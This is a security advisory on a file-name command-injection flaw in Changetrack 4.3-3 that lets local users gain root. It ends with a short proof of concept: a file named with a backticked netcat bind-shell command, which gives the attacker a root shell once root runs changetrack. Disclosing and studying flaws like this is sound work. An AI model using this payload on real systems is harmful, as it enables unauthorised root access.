Changetrack version 4.3-3 suffers from a local privilege escalation vulnerability.
1a24316e8b2fab56fbbf912c6014e79a481b5a2ce5574ff448911085fa63e591
TITLE:
Changetrack Privilege Escalation Vulnerability
SECUNIA ADVISORY ID:
SA36756
VERIFY ADVISORY:
http://secunia.com/advisories/36756/
DESCRIPTION:
A vulnerability has been discovered in Changetrack, which can be
exploited by malicious, local users to gain escalated privileges.
The application does not properly escape certain file names, which
can be exploited to inject and execute arbitrary shell commands
(potentially with "root" privileges) by creating a maliciously named
file in a directory tracked by Changetrack.
Successful exploitation requires write privileges to a directory
scanned by Changetrack.
SOLUTION:
Use Changetrack to track trusted directories only.
PROVIDED AND/OR DISCOVERED BY:
Marek Grzybowski
--------------------------------------------------------------------------------
Example of exploitation:
------------ Attacker ----------
rick@testmachine:~/testt$ touch "<\`nc -l -p 5001 -e \$SHELL\`"
rick@testmachine:~/testt$ ls
<`nc -l -p 5001 -e $SHELL`
--------------------------------
------------ root --------------
testmachine:~# changetrack
------------ root --------------
------------ Attacker ----------
rick@testmachine:~/testt$ nc 127.0.0.1 5001
id
uid=0(root) gid=0(root) groups=0(root)
--------------------------------